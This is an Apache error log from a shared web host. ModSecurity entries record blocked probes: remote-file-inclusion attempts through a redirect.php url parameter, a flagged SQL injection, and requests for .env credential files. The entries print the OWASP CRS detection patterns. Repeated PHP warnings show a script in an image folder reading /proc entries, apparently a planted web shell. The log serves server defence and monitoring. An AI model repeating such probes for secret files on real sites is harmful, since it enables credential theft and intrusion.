[Tue May 12 03:01:08.873921 2026] [security2:error] [pid 1730207:tid 1730220] [client 43.166.255.102:56268] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ71Due9Sp-pIv_Bb6TAAAAAUs"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://mwmindfulness.com
[Tue May 12 03:01:51.129681 2026] [authz_core:error] [pid 1730175:tid 1730195] [client 47.128.46.84:27580] AH01630: client denied by server configuration: /home/missmand/public_html/lib/app/error_log
[Tue May 12 03:02:53.791933 2026] [autoindex:error] [pid 1730207:tid 1730232] [client 206.189.180.50:60924] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/55/task/55/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/55/task/55/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/55/task/55/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/55/task/55/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/55/task/55/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/55/task/55/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:03:06.253242 2026] [security2:error] [pid 1707624:tid 1707699] [client 35.169.119.108:23054] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://121.181.234.77 found within ARGS:url: http://121.181.234.77/bbs/board.php?bo_table=blessed_pray"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ8SrOxS7i6i_mT2NLK0AAAAFE"]
[Tue May 12 03:03:06.253792 2026] [security2:error] [pid 1707624:tid 1707699] [client 35.169.119.108:23054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ8SrOxS7i6i_mT2NLK0AAAAFE"]
[Tue May 12 03:03:06.254039 2026] [security2:error] [pid 1707624:tid 1707699] [client 35.169.119.108:23054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ8SrOxS7i6i_mT2NLK0AAAAFE"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704678/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704678/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704678/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704678/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704678/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704678/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:03:45.708973 2026] [security2:error] [pid 1695975:tid 1695999] [client 52.204.37.237:20307] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://222.239.231.61 found within ARGS:url: http://222.239.231.61/bbs/board.php?bo_table=free"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ8cdVI9ymHBxup74-PIwAAAJU"]
[Tue May 12 03:03:45.709481 2026] [security2:error] [pid 1695975:tid 1695999] [client 52.204.37.237:20307] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ8cdVI9ymHBxup74-PIwAAAJU"]
[Tue May 12 03:03:45.709724 2026] [security2:error] [pid 1695975:tid 1695999] [client 52.204.37.237:20307] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ8cdVI9ymHBxup74-PIwAAAJU"]
[Tue May 12 03:03:46.274277 2026] [ssl:error] [pid 1707624:tid 1707699] (EAI 2)Name or service not known: [client 40.88.21.235:3882] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:03:46.274330 2026] [ssl:error] [pid 1707624:tid 1707699] AH01941: stapling_renew_response: responder error
[Tue May 12 03:03:46.633052 2026] [ssl:error] [pid 1730175:tid 1730185] (EAI 2)Name or service not known: [client 40.88.21.235:3853] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:03:46.633101 2026] [ssl:error] [pid 1730175:tid 1730185] AH01941: stapling_renew_response: responder error
[Tue May 12 03:04:54.320687 2026] [security2:error] [pid 1691274:tid 1691296] [client 103.212.208.2:35154] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: ff6e7075ff718d82ca63e5e612cb300b||1778549645||1778549285"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJ8tlfdQaraX_prmqciwwAAABQ"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 03:04:54.321121 2026] [security2:error] [pid 1691274:tid 1691296] [client 103.212.208.2:35154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJ8tlfdQaraX_prmqciwwAAABQ"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 03:04:54.332463 2026] [security2:error] [pid 1691274:tid 1691296] [client 103.212.208.2:35154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJ8tlfdQaraX_prmqciwwAAABQ"], referer: https://la-grande-fabrique.com/?p=4057
[Tue May 12 03:05:04.780999 2026] [security2:error] [pid 1695975:tid 1695995] [client 43.135.186.135:40248] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/bauges/"] [unique_id "agJ8wNVI9ymHBxup74-PWQAAAJE"]
[Tue May 12 03:05:29.823315 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:05:30.692025 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:05:52.491975 2026] [security2:error] [pid 1730207:tid 1730219] [client 139.155.126.16:60808] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJ88Due9Sp-pIv_Bb6UbwAAAUo"]
[Tue May 12 03:05:57.985026 2026] [security2:error] [pid 1730175:tid 1730186] [client 52.21.62.139:38458] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://142.93.202.210 found within ARGS:url: https://142.93.202.210/slot/?slot=dewi138"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ89Xo6NvB9WXx5V-59jgAAAQk"]
[Tue May 12 03:05:57.985544 2026] [security2:error] [pid 1730175:tid 1730186] [client 52.21.62.139:38458] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ89Xo6NvB9WXx5V-59jgAAAQk"]
[Tue May 12 03:05:57.985805 2026] [security2:error] [pid 1730175:tid 1730186] [client 52.21.62.139:38458] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ89Xo6NvB9WXx5V-59jgAAAQk"]
PHP Warning:  filesize(): stat failed for /proc/853/task/853/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/853/task/853/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/853/task/853/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/853/task/853/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/853/task/853/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/853/task/853/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:06:10.063856 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:06:11.014232 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:06:14.475945 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:06:15.410157 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:06:16.606133 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:06:17.462817 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705041/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705041/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705041/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705041/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705041/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705041/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:06:44.713242 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:06:45.576874 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:06:56.000691 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:06:56.887549 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:07:04.193969 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:07:21.715652 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:07:22.611886 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:07:23.526126 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:07:46.412802 2026] [security2:error] [pid 1691274:tid 1691285] [client 5.255.122.176:29388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env"] [unique_id "agJ9YlfdQaraX_prmqcjqAAAAAg"]
[Tue May 12 03:07:46.413120 2026] [security2:error] [pid 1691274:tid 1691285] [client 5.255.122.176:29388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env"] [unique_id "agJ9YlfdQaraX_prmqcjqAAAAAg"]
[Tue May 12 03:07:46.427647 2026] [security2:error] [pid 1691274:tid 1691285] [client 5.255.122.176:29388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agJ9YlfdQaraX_prmqcjqAAAAAg"]
[Tue May 12 03:07:46.569938 2026] [security2:error] [pid 1730175:tid 1730193] [client 5.255.122.176:29440] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/backend/.env"] [unique_id "agJ9Yno6NvB9WXx5V-5-NQAAARA"]
[Tue May 12 03:07:46.570186 2026] [security2:error] [pid 1730175:tid 1730193] [client 5.255.122.176:29440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/backend/.env"] [unique_id "agJ9Yno6NvB9WXx5V-5-NQAAARA"]
[Tue May 12 03:07:46.573366 2026] [security2:error] [pid 1695975:tid 1695991] [client 5.255.122.176:29408] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/app/.env"] [unique_id "agJ9YtVI9ymHBxup74-P-QAAAI0"]
